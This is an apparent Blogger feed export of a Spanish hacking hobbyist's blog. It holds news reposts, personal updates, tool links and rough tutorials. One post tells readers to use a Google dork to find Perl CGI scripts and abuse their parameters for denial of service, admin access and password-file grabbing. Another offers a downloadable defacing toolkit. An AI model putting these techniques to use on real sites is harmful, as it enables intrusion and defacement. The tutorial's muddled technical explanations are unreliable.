tag:blogger.com,1999:blog-16054597867313335852024-02-18T21:24:32.135-08:00Ethical Hack Un Mundo DiferenteShadinessDarkhttp://www.blogger.com/profile/02265018104571745363noreply@blogger.comBlogger75125tag:blogger.com,1999:blog-1605459786731333585.post-69700407791469822532010-04-21T21:35:00.000-07:002010-04-21T21:47:11.554-07:00Regresando al under.<meta equiv="Content-Type" content="text/html; charset=utf-8"><meta name="ProgId" content="Word.Document"><meta name="Generator" content="Microsoft Word 11"><meta name="Originator" content="Microsoft Word 11"><link rel="File-List" href="file:///C:%5CDOCUME%7E1%5CUSERPE%7E1.000%5CCONFIG%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"><!--[if gte mso 9]><xml> <w:worddocument> <w:view>Normal</w:View> <w:zoom>0</w:Zoom> <w:hyphenationzone>21</w:HyphenationZone> <w:punctuationkerning/> <w:validateagainstschemas/> <w:saveifxmlinvalid>false</w:SaveIfXMLInvalid> <w:ignoremixedcontent>false</w:IgnoreMixedContent> <w:alwaysshowplaceholdertext>false</w:AlwaysShowPlaceholderText> <w:compatibility> <w:breakwrappedtables/> <w:snaptogridincell/> <w:wraptextwithpunct/> <w:useasianbreakrules/> <w:dontgrowautofit/> </w:Compatibility> <w:browserlevel>MicrosoftInternetExplorer4</w:BrowserLevel> </w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:latentstyles deflockedstate="false" latentstylecount="156"> </w:LatentStyles> </xml><![endif]--><style> <!-- /* Style Definitions */ p.MsoNormal, li.MsoNormal, div.MsoNormal {mso-style-parent:""; margin:0cm; margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:12.0pt; font-family:"Times New Roman"; mso-fareast-font-family:"Times New Roman";} @page Section1 {size:612.0pt 792.0pt; margin:70.85pt 3.0cm 70.85pt 3.0cm; mso-header-margin:36.0pt; mso-footer-margin:36.0pt; mso-paper-source:0;} div.Section1 {page:Section1;} --> </style><!--[if gte mso 10]> <style> /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Tabla normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-parent:""; mso-padding-alt:0cm 5.4pt 0cm 5.4pt; mso-para-margin:0cm; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-ansi-language:#0400; mso-fareast-language:#0400; mso-bidi-language:#0400;} </style> <![endif]--> <p class="MsoNormal">Bueno señores quizás ya nadie visite mi blog tenia mucho tiempo sin entrar a la red estaba perdido del under, Ya empezare a entrar de nuevo a la red quizás visitar viejos foros de amigos de la red! "Aunque sean pocos" Porque la mayoría tiene bronca conmigo...
<br />
<br />Pero les anuncio que pronto abriré BugDox de nuevo una .org Lo mas seguro le comente a mi amigo kuter haber que tal si volvemos o que y bueno también a mi pana ManditoO haber si quiere darle
<br />Con nosotros ya que es en las personas que por ahora contacto mas aunque tengo tiempo sin entrar a mi Messenger de shadinessdark pero pronto vuelvo voy con revista y todo uno dice "ME RETIRO" pero la red te llama tengo unos meses sin estudiar sobre informática pero veré si me pongo al día de nuevo y vuelvo a mi rutina de antes.
<br />
<br />Saludos a mis panas y a los que les caigo mal también...
<br />
<br />Saludos especiales:
<br />
<br />Kuter
<br />ManditoO
<br />Jeferx
<br />Tr4$h "Amigo no recuerdo bien como se escribe tu nombre pero espero no te moleste"
<br />Dangus y a tu comunidad broth.</p> ShadinessDarkhttp://www.blogger.com/profile/02265018104571745363noreply@blogger.com0tag:blogger.com,1999:blog-1605459786731333585.post-62807259619067989302010-02-22T06:32:00.000-08:002010-02-22T06:33:01.519-08:00El hacker chino Majia: "lo hago tanto por dinero como por diversión"<h4>"Se puede hacer mucho dinero vendiendo virus y troyanos"</h4><br /><div class="texto"> <p>Su trabajo consiste en robar información de individuos, empresas o gobiernos. Lo hace tanto por dinero como por diversión. Se hace llamar Majia y es uno de los cada vez más famosos hackers chinos especialmente por casos como el ataque a Google.</p> <p>El joven a accedido a una entrevista en su modesta casa en Changsha, en el interior de China. Aunque no ha desvelado su identidad para el artículo <a href="http://www.nytimes.com/2010/02/02/business/global/02hacker.html?hp=&pagewanted=all" target="_blank" title="Hackeando por diversión y dinero en China"><i>Hacking for Fun and Profit in China's Underworld</i></a>.</p> <p>Nada más empezar la entrevista el hacker enseña un archivo en la pantalla de su ordenador:</p> <blockquote> <p>"Esta es la lista de personas que han sido infectados con mi troyano (más de 2.000). Ellos ni siquiera saben lo que ha pasado."</p> </blockquote> <p>Majia confirma que el gobierno chino recluta a muchos hackers para su departamento de Defensa. Sus clientes también suelen ser grandes corporaciones que buscan como robar información a otras empresas o gobiernos.</p> <blockquote> <p>"Se hace mucho dinero vendiendo virus y troyanos para infectar los ordenadores de los demás."</p> <p>"Los hackers también rompen la seguridad de algunos videojuegos para robar usuarios y luego venderlos. Es mucho dinero."</p> </blockquote> <p>Hackear en Internet se ha convertido en un deporte nacional en China. Hay revistas especializadas y libros que explican paso a paso como crear un troyano. Sin embargo, no todos lo hackers son iguales.</p> <blockquote> <p>"La mayor parte de los hackers son unos vagos. Sólo unos pocos pueden realmente escribir código. Esa es la parte dura."</p> </blockquote> <p>Respecto al ataque a Google, afirma que no fueron chinos los que lo hicieron. Dice que el código malicioso provenía del extranjero y sólo fue empujado desde China.</p> <p>Majia vive con sus padres en piso pequeño. Tiene un ordenador y una conexión potente. Nunca deja rastro de sus acciones. Si lo pillasen las autoridades chinas le podrían caer hasta 7 años de cárcel.</p><p><br /></p>Fuente:http://www.periodistadigital.com/tecnologia/internet/2010/02/05/entrevista-hacker-chino-majia-hago-dinero-diversion.shtml </div>ShadinessDarkhttp://www.blogger.com/profile/02265018104571745363noreply@blogger.com0tag:blogger.com,1999:blog-1605459786731333585.post-39579608386217288112010-02-22T06:25:00.000-08:002010-02-22T06:38:50.787-08:00EEUU identifica al autor de parte del código origen del 'ciberataque' a Google<div id="tamano"> <p>Analistas oficiales de EEUU creen que un hombre con vínculos con el Gobierno chino <strong>escribió una parte clave de un programa 'espía' utilizado en el ataque a Google</strong> el <a href="http://googleblog.blogspot.com/2010/01/new-approach-to-china.html" target="_blank">pasado diciembre</a>.</p> <p><a href="http://www.ft.com/cms/s/0/a6f5621c-1f21-11df-9584-00144feab49a.html?nclick_check=1" target="_blank">Según el diario Financial Times</a>, el hombre, un consultor de seguridad de 30 años envió partes del programa a un foro de 'hacking', donde lo describió como algo "en lo que estaba trabajando", afirma el diario, que cita a un investigador no identificado que trabajan para el Gobierno de EEUU.</p> <p>El creador del 'software espía' <strong>trabaja como 'freelance' y no lanzó el ataque</strong>, pero funcionarios chinos tuvieron "acceso especial" a su obra, según el informe.</p> <p>Según el investigador anónimo citado por el periódico, el Gobierno tiene el privilegio de acceder al trabajo de los investigadores de un determinado nivel.</p> <p>Las denuncias sobre <a href="http://www.elmundo.es/elmundo/2010/01/26/navegante/1264493080.html">el 'software' espía</a> son el penúltimo episodio de una serie de conflictos que ha enfrentado a Google y Estados Unidos contra China.</p> <p>En enero, el gigante de Internet <a href="http://www.elmundo.es/elmundo/2010/01/13/navegante/1263339089.html">amenazó con retirarse de China</a> y cerrar su portal Google.cn tras denunciar el alto nivel de censura y la 'piratería' informática sofisticada proveniente de China.</p> <p>Washington apoya las críticas y <a href="http://www.elmundo.es/elmundo/2010/01/21/navegante/1264088633.html">ha instado a Pekín</a> a que investigue a fondo las denuncias. Pekín ha reiterado en varias ocasiones que <a href="http://www.elmundo.es/elmundo/2010/01/25/navegante/1264408366.html">se opone a la 'piratería'</a>.</p> <p>El Financial Times también citó a fuentes no identificadas que respaldan una información del New York Times sobre <a href="http://www.elmundo.es/elmundo/2010/02/19/navegante/1266565611.html">el origen de los ataques a Google</a>, que sitúa en dos instituciones educativas de China, la prestigiosa Universidad Jiaotong de Shanghai y la escuela profesional Lanxiang.</p> <p><strong>Las dos instituciones han negado las acuasaciones</strong>. De hecho, la escuela Lanxiang forma a peluqueros, cocineros y mecánicos de automóviles, por lo que dichas acusaciones han causado burlas en el ciberespecio chino. No obstante uso de la dirección IP de la escuela podría significar simplemente que los 'hackers' se habrían apoderado del control de sus ordenadores para ocultar sus huellas.</p><p>Fuente: http://www.elmundo.es/elmundo/2010/02/22/navegante/1266829228.html<br /></p><p><br /></p> </div>ShadinessDarkhttp://www.blogger.com/profile/02265018104571745363noreply@blogger.com0tag:blogger.com,1999:blog-1605459786731333585.post-19835322284545567892010-02-21T19:39:00.000-08:002010-02-21T19:42:19.152-08:00Backtrack 3Aquí les dejo el backtrack es un sistema operativo que cuenta con muchas herramientas lo use<br />Un tiempo y para mi es lo mejor de Linux use ubuntu y Linux y ninguno se compara...<br /><br /><a href="http://es.wikipedia.org/wiki/BackTrack" target="_blank">Si quieren saber mas sobre esta distribución de Linux Clic</a><br /><br />Screen Sacada De Wikipedia.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://upload.wikimedia.org/wikipedia/commons/thumb/4/4a/Backtrack_3.0_Final.png/750px-Backtrack_3.0_Final.png"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 564px; height: 600px;" src="http://upload.wikimedia.org/wikipedia/commons/thumb/4/4a/Backtrack_3.0_Final.png/750px-Backtrack_3.0_Final.png" alt="" border="0" /></a><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><span style="color: red;"><b>Descarga: - - - ''Links sacados de espaciolinux'' - - -</b></span><br /><br />Backtrack 3<br /><a href="http://ftp//ftp.cc.uoc.gr/mirrors/linux/backtrack/bt3-final.iso" target="_blank">Mirror 1</a><br />versión USB<br /><a href="http://ftp//ftp.cc.uoc.gr/mirrors/linux/backtrack/bt3-final.iso" target="_blank">Mirror 1</a><br />Backtrack 3 – imagen VMWare<br /><a href="http://mirror.switch.ch/ftp/mirror/backtrack/BACKTRACK3_VMWare.rar" target="_blank">Mirror 1</a><br /><br />Para hacer el post mas completo le dejo las herramientas que van a necesitar para usarlo<br />En PC virtual si gustan claro.<br /><br />Herramientas para uso.<br /><br />En mi caso para el .iso les recomiendo Daemon Tools algunos usan alcohol 120.<br /><br /><a href="http://daemon-tools.softonic.com/" target="_blank">Daemon Tools Clic Descarga.</a><br /><br />Y si quieren usar una PC Virtual les recomiendo el uso de VirtualBox.<br /><br /><a href="http://www.virtualbox.org/wiki/Downloads" target="_blank">VirtualBox Download</a><br /><br />Si no saben como usar el .iso y el virtualbox simplemente me dicen y les hago un tutorial.<br /><br /><span style="font-weight: bold;">Atte: [WG]Night [Soy yo =P]</span><br /><br /><span style="font-weight: bold;">Contact:</span><br /><br /><span style="font-weight: bold;">Nihgt@whitegunz.net</span><br /><span style="font-weight: bold;">o</span><br /><span style="font-weight: bold;">ShadinesDark@hotmail.com</span>ShadinessDarkhttp://www.blogger.com/profile/02265018104571745363noreply@blogger.com0tag:blogger.com,1999:blog-1605459786731333585.post-17317191751746897422010-02-21T19:28:00.000-08:002010-02-21T19:39:20.211-08:00¿De quién es mi PlayStation?<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://files.publico.es/resources/archivos/2010/1/29/1264731217630hackerdn.jpg"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 300px;" src="http://files.publico.es/resources/archivos/2010/1/29/1264731217630hackerdn.jpg" alt="" border="0" /></a><br /><br /><br />Móviles bloqueados por la operadora, lectores de libros que sólo leen las obras compradas al fabricante, ordenadores atados a un sistema operativo y, sobre todo, consolas, muchas consolas, cuyos fabricantes sólo quieren que se usen para jugar. Ese es el escenario que ha vuelto a cuestionar un joven de 20 años al hackear la PlayStation 3. Y se da la circunstancia de que el estadounidense George Hotz, alias Geohot, ya liberó el iPhone de Apple hace tres años.<br /><br />Geohot anunció el pasado fin de semana que había midificado el hardware de la PS3. No contento con eso, el miércoles publicó en Internet cómo hacerlo. Esto permitirá a muchos otros hackers destripar una consola que, desde que salió hace tres años, tenía imagen de ser inviolable.<br /><br />Todos los fabricantes de consolas (y otras muchas compañías de hardware) limitan el uso de sus productos a sus compradores. Por ejemplo, sólo pueden leer videojuegos originales. No se les puede instalar ninguna aplicación que no permita expresamente el fabricante. Pero, a partir de ahora, gracias a este joven hacker, ya se le puede instalar Linux y programas caseros. En todo caso, seguirá sin reconocer copias piratas de los juegos.<br /><br />Pero no se trata tanto de evitar la piratería como del control. Al menos eso es lo que opina Álvaro Garrido, administrador de Elotrolado.net, la página de referencia sobre hacking: "Las consolas son ordenadores, pero limitados artificialmente para que el fabricante controle qué puede y qué no puede ejecutar".<br /><br />A diferencia de un ordenador, donde el usuario puede instalar el sistema operativo y ejecutar las aplicaciones que quiera, "en una consola generalmente sólo puedes ejecutar lo que el fabricante ha aprobado, previo cobro de una licencia al programador", añade Garrido.<br /><br />"Los fabricantes se escudan en la protección de la propiedad intelectual, pero en realidad lo que intentan proteger a toda costa es el monopolio de la misma", añade. Para Garrido, "intentan que la consola no le pertenezca al usuario legítimo que ha pagado por el hardware, sino a ellos".<br /><br />Desde Elotrolado.net explican que lo que ha hecho Geohot con la PS3 es un acceso a bajo nivel, sin conseguir controlar el software de la consola, "por lo que ahora mismo no tiene ninguna utilidad para el usuario final", explica Garrido. Eso sí, "abre una importante brecha de seguridad para que otros hackers con los conocimientos y tiempo necesarios tengan muchas más facilidades para buscar otros agujeros para acceder al firmware de la consola", añade.<br /><br />Juicios en España<br /><br />A pesar de ser la industria del entretenimiento más rentable, muy por delante del cine y la música, las empresas de consolas son las más agresivas defendiendo su negocio. En España, Adese, la patronal del sector, ha llevado a los tribunales a empresas que vendían chips modificados u otros sistemas no autorizados por el fabricante.<br /><br />Hay sentencias para todos los gustos. El auto más reciente, de la Audiencia Provincial de Zaragoza del 19 de enero, rechazó el archivo de una causa contra una tienda por vender dispositivos que, según Adese, servían para neutralizar el sistema de protección que impide la reproducción de juegos piratas. Las audiencias de Barcelona y Madrid han condenado a varios establecimientos de informática. Pero, al mismo tiempo, la de Valencia ha absuelto a otros dos por casos similares.<br />Código penal<br /><br />El director de la Federación para la Protección de Propiedad Intelectual (FAP), José Manuel Tourné, opina que la ley está muy clara: "No sólo la comercialización, la mera tenencia de un medio técnico de este tipo es perseguible". El artículo 270 del Código Penal dice que "será castigado también con la misma pena quien fabrique, importe, ponga en circulación o tenga cualquier medio específicamente destinado a facilitar la supresión no autorizada o la neutralización de cualquier dispositivo técnico que se haya utilizado para proteger programas de ordenador o cualquiera de las otras obras, interpretaciones o ejecuciones en los términos previstos en el apartado 1 de este artículo".<br /><br />La clave aquí es la palabra específicamente. Si la modificación no tiene el fin específico de burlar la protección del sistema, no es ilegal, aunque la burle. "El hardware, por definición, es multiusos", explica el abogado Carlos Sánchez Almeida, que ha defendido a varias tiendas denunciadas.<br /><br />Algunas sentencias o autos de archivo se han basado en que el artilugio denunciado podía servir para otros usos. Así lo dijo en noviembre un juez de Salamanca, para quien los cartuchos modificados para la Nintendo DS ampliaban sus funciones. De vivir en España, Geohot sólo sería culpable de ampliar las capacidades de la PS3, aunque su método abra también el camino a los videojuegos piratas.<br /><br /><span style="font-weight: bold;">Fuente: http://www.publico.es/ciencias/289827/quien/playstation </span>ShadinessDarkhttp://www.blogger.com/profile/02265018104571745363noreply@blogger.com0tag:blogger.com,1999:blog-1605459786731333585.post-3346174263622969312010-01-27T18:31:00.000-08:002010-01-27T19:52:57.687-08:00Ofrezco mis servicios Diseño Grafico Flash/Photoshop<p><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://img2.imageshack.us/img2/6436/diseografico.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 500px; height: 160px;" src="http://img2.imageshack.us/img2/6436/diseografico.png" border="0" alt="" /></a><br /></p><p><strong><span style="color:#ff0000;">Buenas tardes a la comunidad…</span><span style="color:#ff0000;"><br /></span><span style="color:#ff0000;"><br /></span><span style="color:#ff0000;">Vengo dejando este mensaje con el fin de cómo dice el tema que se hacen diseños en flash – PhotoShop. </span><span style="color:#ff0000;"><br /></span><span style="color:#ff0000;"><br /></span><span style="color:#ff0000;">Somos 2 personas con experiencia de casi 3 años en el diseño grafico hasta ahora </span><span style="color:#ff0000;"><br /></span><span style="color:#ff0000;">No hemos trabajado con ninguna empresa ni nada por el estilo hasta hoy andamos</span><span style="color:#ff0000;"><br /></span><span style="color:#ff0000;">Buscando trabajo como diseñadores de logos – Templates etc. </span><span style="color:#ff0000;"><br /></span><span style="color:#ff0000;"><br /></span><span style="color:#ff0000;">Les informo que no hacemos templates flash por ahora solo en photoshop para mas información o para nuestros servicios mándenme un MP con sus correos o especificando lo que desean no cobramos hasta que el cliente vea el diseño y opine. </span><span style="color:#ff0000;"><br /></span><span style="color:#ff0000;"><br /></span><span style="color:#ff0000;">Pagos PayPal. </span><span style="color:#ff0000;"><br /></span><span style="color:#ff0000;"> </span></strong></p><p><span style="color:#ff0000;">Contact. <br /></span></p><p><span style="color:#ff0000;">the_strike_defense@hotmail.com<br /></span></p><p><span style="color:#ff0000;">Jeferx@hotmail.es<br /></span></p>ShadinessDarkhttp://www.blogger.com/profile/02265018104571745363noreply@blogger.com0tag:blogger.com,1999:blog-1605459786731333585.post-33282436780140356132010-01-27T18:19:00.000-08:002010-01-27T18:26:20.558-08:00Sobre proyecto BugDox<p> <p><strong>Bueno como muchos de los visitantes deben saber www.ethical-security.co.cc ha cerrado la mayoría de los administradores nos retiramos del UNDER mi razón fue muchos problemas los tiempos no son los mismos =) Y bueno ahora me dedico a hacer otras cosa con mi gran brother Jeferx que es con la única persona que guarde la amistad en la red y mis otros dos gran Brothers Kuter y manditOo que ahora tiene otro nombre bueno los 4 nos dedicamos ahora a cosas distintas yo ando con un server de juego con jeferx Kuter diseño grafico si no estoy equivocado y manditOo esta haciendo sus buenos proyectos con creación de webs que aproximadamente en un tiempo tendrá todo listo y podrán ver sus creaciones. </strong></p> <p><strong>Bueno señores mi blog seguiré poniendo cositas de vez en cuando tutoriales Éticos Claro quilas un poco de under, Y bueno ya deben andar los que me jodian feliz con que shadinessdark se retiro de la red por un gran tiempo aun sigo en ella pero con otros planes y otro rumbo bueno señores les agradezco sus visitas y que pasen un feliz año. </strong></p><p><strong>Att: ShadinessDark <br /></strong></p><p><strong>PD. Quizas un dia y nos provoque re-abrir bugdox pero ya vendriamos con BugDox.org =)<br /></strong></p> <strong></strong><strong><br /></strong><p></p>ShadinessDarkhttp://www.blogger.com/profile/02265018104571745363noreply@blogger.com2tag:blogger.com,1999:blog-1605459786731333585.post-6848934769806826422009-12-05T05:12:00.000-08:002009-12-05T05:13:45.201-08:00Negacion de servicios - Escala de privilegios<span style="font-weight: bold; color: rgb(255, 0, 0);">Relato del Autor.</span><br /><br />Bueno antes que nada saludos a todo los lectores les voy a explicar un método de ataque Que se basa en la explotación de programas basados en Web pues, Son dos tipos de Ataques son:<br /><br />1.) Negación de servicio<br />2.) Escala de privilegios<br /><br />Bueno primero que nada debemos aprovechar buscando en Google con el Dork:<br /><br />filetype: pl "$ FORM ("<br /><br />Bueno con esto cada archivo que encontraran será un script en perl mucho son Ejecutables dentro de los resultados de búsqueda encontraran cosas como por ejemplo: $ FORM ( 'Mode')<br /><br /><span style="font-weight: bold; color: rgb(255, 0, 0);">¿Qué modo usa la variable?</span><br /><br />El atacante puede buscar declaraciones provistas usando eq, ne, o ===<br /><br />Ejemplo:<br /><br />Admin) if ($ FORM ( 'Mode' en 'A')<br /><br />La dirección de la solicitud URL seria.<br />http://www.site.org/search/search.pl?Mode=Administrator<br /><br />Muchas formas de nombrar la ultima Puede ser usuario, User, Nombre etc…<br /><br />En esta URL tenemos dos opciones:<br /><br />1.) Intentar utilizar el servidor ejecutando comandos para escalar privilegios<br />“Un Recorrido de directorio, Archivo de contraseña de agarrar, chmod, etc…”<br /><br />2.) Utilizarlo para crear una condición de una denegación de servicio<br /><br />Si nuestro objetivo es el primero entonces le corresponderíamos a la creatividad y la resolución de puzzles nos podría ayudar.<br />Y pues, si vamos para una condición de denegación de servicios ( Esta opción seria mas fácil ) Cuando el atacante encuentra una variable, Un comando POST en la dirección, Con una variable incluida que esta echa por el mismo en<br />(PERL O C) También enviar un comando POST al servidor Web.<br /><br />Digamos que el atacante encuentra un libro de visitas y hay dos variables casi siempre ‘Nombre’ ‘Comentario’ como sabemos en el libro de visitas hará:<br />POST / HTTP/1.1 cgi-bin/hola.pl<br />minombre=BugDox&comentario=Ejemplo de variable = minombre BugDox & comentario = ejemplo de variable<br /><br />No digo que les quede si pero mas o menos así seria las 2 variables es un bucle White rápido, El post anterior causaría una condición DoS, Para asegurarse que algo esta ejecutable.<br /><br />Author: ShadinessDark<br />Dedicated: BPSystem - BugDox<br /><br />Saludos Especiales a mis brothers de la comunidad ;DShadinessDarkhttp://www.blogger.com/profile/02265018104571745363noreply@blogger.com0tag:blogger.com,1999:blog-1605459786731333585.post-90967918898325685892009-12-03T14:08:00.000-08:002009-12-03T14:10:39.742-08:00INFORMATICA FORENSE: By ShadinessDarkNo es gran aporte pero es un pequeño relato. <br /><br />INFORMATICA FORENSE:<br /><br />Antes de empezar quiero darle un saludo a los lectores y la a comunidad BugDox este Tema se basa en algo Básico que es la TEORIA…<br /><br />1.1 Relato del autor <br /><br />Digamos que en el mundo de la informática forense el trabajo es extraer datos de almacenamiento De determinada información, Y examinar datos potenciales pertinentes o pruebas, Cuando Examinamos los datos con mucha frecuencia es decir a menudo nos conduce a una visión lo que <br />Un intruso u/o empresa estaba haciendo en el momento de los medios de almacenamiento.<br /><br />1.2 Firewall Analysis<br /><br />Digamos que en la mayoría de sitios/empresas el servidor de seguridad siempre es el primero y único obstáculo para algún atacante con la intención de acceder a los recursos internos de cuyo Empresa por lo tanto seria vital que el firewall este configurado correctamente por lo tanto no Permite el trafico a la red no autorizada Es muy común que el conjunto de Reglas del firewall que Regula lo que esta autorizado o no es decir si hay un archivo llamado bugdox y esta un intruso llamado pedro y el firewall esta configurado para darle permiso a bugdox pero no a pedro y pedro intenta acceder a los archivos interno le Daria un mensaje de que no es requerido en el SISTEMA.<br /><br />1.3 Un firewall<br /><br />Como la mayoría debe conocer un firewall es un conjunto integrado en medidas de seguridad Es destinado a impedir los accesos electrónicos no autorizados a un sistema de red como Sabemos también es un conjunto de dispositivos configurados para:<br /><br />Permitir<br />Negar<br />Cifrar <br />Descifrar<br />O el proxy en todo el trafico del equipo entre los diferentes dominios de la seguridad que se basa<br />En un conjunto de normas y otros criterios...<br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />1.3 Los puertos <br /><br />Muchos de los lectores saben que Todo el tráfico de la red pasa a través de un firewall es como decir Parte de una (Conexión), Esta conexión se compone del par de direcciones IPS que están comunicándose entre si. <br /><br />Como digamos un par de números de puerto siempre el numero de puerto el destino a menudo Indica el tipo de servicio/s que se conecta es decir si estamos en un red con varias pc conectadas A 1 misma red se están comunicando con una misma IPS no se si sea entendido cuando un servidor De seguridad o firewall mejor dicho bloquea nuestra conexión nos guardara el numero de puerto de Destino a su archivo de registro...<br /><br /> Los puertos más conocidos son de 0 y 1023 aunque les explicare los mas importantes en el área Porque si les explico del 0 al 1023 no nos dará tiempo de leer algo tan largo estos están vinculados a los servicios lo general el trafico en este puerto se nos indica claramente el protocolo Para el servicio. Un ejemplo el Port 80 Casi siempre les indica el trafico del HTTP pueden probarlo Uds., Mismos por medio de TELNET...<br /><br />Bueno los puertos registrados tienen un valor de 1024 y 49151 estos son débilmente ligados en los Servidores. <br /><br />Es decir que existen numerosos servicios (Vinculados) en estos puertos Estos puertos también Lo utilizan con otros fines muchas personas mal intencionadas para buscar información en algún Servidor la mayoría de los sistemas empiezan a repartir los puertos dinámicos a partir del puerto<br />1024<br /><br />La dinámica es decir los puertos privados vienen del 49152 y 65535 yo diría que ningún servicio Debería de asignar estos puertos en realidad una maquina debería de comenzar asignar los 'Dinámicos' Los puertos del 1024 para adelante empiezan a partir de RPC en el 32768 he sacado Un poco de teoría de la Wikipedia para poder explicar un poco sobre los puertos la mayoría esta Ah mano escrita para que no piensen que todo el merito lo da la Wikipedia.<br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />1.4 Explicación de puertos importantes <br /><br />Puerto 21: <br /><br />A este puerto le asignamos puerto de FTP por este puerto suelen los hackers aprovecharse de la Mala seguridad de los WebMasters de los sitios Web, En este puerto buscan abrir un servidor FTP Anónimo se trata de servidores con los directorios abiertos con permisos de escribir y leer este Puerto lo utilizan para trasferencias de muchas cosas puede ser un 'SHELL' 'Backdoors' etc... <br /><br />Puerto 22:<br /><br />A este puerto le asignamos puerto SSH este puerto se relaciona con la conexión TCP este puerto Podría indicar una búsqueda ssh, que tiene una característica de explicación.<br /><br />Puerto 23:<br /><br />A este puerto le asignamos puerto TELNET funciona de la manera siguiente el atacante busca Un login remoto en UNIX, la mayoría de los atacantes dan un tiempo para la exploración del puerto Con ese tiempo se acercan a saber que timo de sistema operativo se esta utilizando. <br /><br />Puertos 33434 y 33600:<br /><br />Estos puertos vienen trabajando con el tracerouter por cierto hice un pequeño tutorial sobre eso Pronto se los mostrare en las ediciones comentadas white shadow. <br /><br />Si con este puerto vemos una serie de paquetes UDP, en este rango de puerto y lo contiene solo Dentro de thisrange entonces seria indicativo de traceroute.<br /><br />By ShadinessDarkShadinessDarkhttp://www.blogger.com/profile/02265018104571745363noreply@blogger.com0tag:blogger.com,1999:blog-1605459786731333585.post-84755041959784123522009-12-02T19:07:00.000-08:002009-12-02T19:10:24.301-08:00BugDox AIO [Defacing]Bueno no es gran cosa es mi primer AIO apenas jeje! Ya ando haciendome uno con informacion mas importante ;) saludos señores! <br /><br />RapidShare Descarga<br />http://rapidshare.com/files/303420657/Copy_of_My_Project.exe.html<br /><br />4Share Descarga<br />http://www.4shared.com/file/147873481/766267f6/Copy_of_My_Project.html<br /><br />PD. Le habia sacado Screem Pero imageshack la elimino )=ShadinessDarkhttp://www.blogger.com/profile/02265018104571745363noreply@blogger.com0tag:blogger.com,1999:blog-1605459786731333585.post-87005009175625307672009-12-02T19:00:00.001-08:002010-02-21T16:36:15.205-08:00hijackthis [Eliminado troyano] By ShadinessDark<div style="text-align: center;"><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://free.antivirus.com/imperia/md/images/us/trendwatch/currentthreatactivity/freetools/tw_80x80_hijackthis.gif"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 80px; height: 80px;" src="http://free.antivirus.com/imperia/md/images/us/trendwatch/currentthreatactivity/freetools/tw_80x80_hijackthis.gif" alt="" border="0" /></a><span style="color: rgb(255, 102, 102);font-size:100%;" ><span style="font-family:arial;">Hijackthis [Eliminado troyano] By ShadinessDark
<br />
<br /></span></span><div style="text-align: left;"><b><span style="color:red;">Escritura del autor.</span></b>
<br />
<br />Como muchos sabemos o hemos visto con nuestros propios ojos millones de Web de la red las están
<br />Atacando con códigos maliciosos los mas usados<b> ~ Php ~ Javascript ~ y secuencia de comandos HTML </b> Entonces Los usuarios están descargando códigos maliciosos para infectar a otros.
<br />
<br /><b><span style="color:red;">¿Como nos infectan?</span></b>
<br />
<br />Cuando abrimos un sitio Web supongamos en mi caso que usare INTERNE EXPLORE Es decir (IE) Y Esta infectado con códigos, la descarga del código malicioso que puede ser un troyano o/u spyware de la url especificada en la etiqueta de iframe bueno ya saben que cuando tenemos
<br />Acrobat Reader se abren navegadores como en mi caso un antivirus nunca suele detectar este
<br />Troyano lo hice con karpesky y no lo detecto con eset tampoco solo han dado la advertencia
<br />Pero nunca lo bloquean sigue apareciendo entre los log de Windows como sabemos cuando vemos
<br />Un trayano en nuestro PC roban las contraseñas de FTP cuando la escribimos en nuestro programa
<br />De FTP el troyano scanea todos los directorios del servidor FTP y encuentran archivos que tengan:
<br />
<br />1.) Principal
<br />2.) Inicio
<br />3.) Predeterminado
<br />4.) índice
<br />
<br />El atacante puede inyectar un código malicioso en estos archivos y también afecta a los usuarios
<br />Que visitan su sitio.
<br />
<br /><span style="color:red;"><b>¿Como saber si estoy infectado?</b></span>
<br />
<br />Vamos a usar una herramienta no se si sea muy conocida aunque en realidad ya la habia visto
<br />Hace tiempo no se si Uds.
<br />
<br />Ya la conocían se llama Hijackthis la pueden encontrar en su Web principal 'Para que no piensen que les meto algún virus es mas confiable descargarlo desde su Web'
<br />
<br /><a href="http://www.trendsecure.com/portal/en-US/tools/security_tools/hijackthis" target="_blank">Http://www.trendsecure.com/portal/en-US/tools/security_tools/hijackthis</a>
<br />
<br /><b>Aqui tienen el sitio Web como encontramos el troyano. </b>
<br />
<br />Antes de seguir les voy a comentar que hace esta herramienta para que tengan un entendido
<br />Para no dejarle todo a lo corto.
<br />
<br /><span style="color:red;"><b> hijackthis: </b></span>
<br />
<br />Esta herramienta scanea rápido nuestro sistema para buscar configuraciones cambiadas por Programas no deseados como por ejemplo:
<br />
<br />Malware
<br />Spyware
<br />Otros...
<br />
<br />Nos crea un informe o archivo de exploración que nos genera los registros de Windows.
<br />
<br />Podrian haber otras entradas diferentes a la mía que es el troyano producido por el IE que les dije
<br />Arriba Este troyano tiene como nombre: AcroIEHelper.dll se registra en las carpetas de adobe casi
<br />Siempre tenemos esa carpeta ya que la mayoría de PC traen en ADOBE instalado no se si me equivoque.
<br />
<br />Captura de hijackthis:
<br />
<br /><img style="width: 431px; height: 534px;" src="http://img98.imageshack.us/img98/932/bugdox.jpg" alt="" border="0" />
<br />
<br /><span style="color:red;"><b>¿como Elimino el troyano?</b></span>
<br />
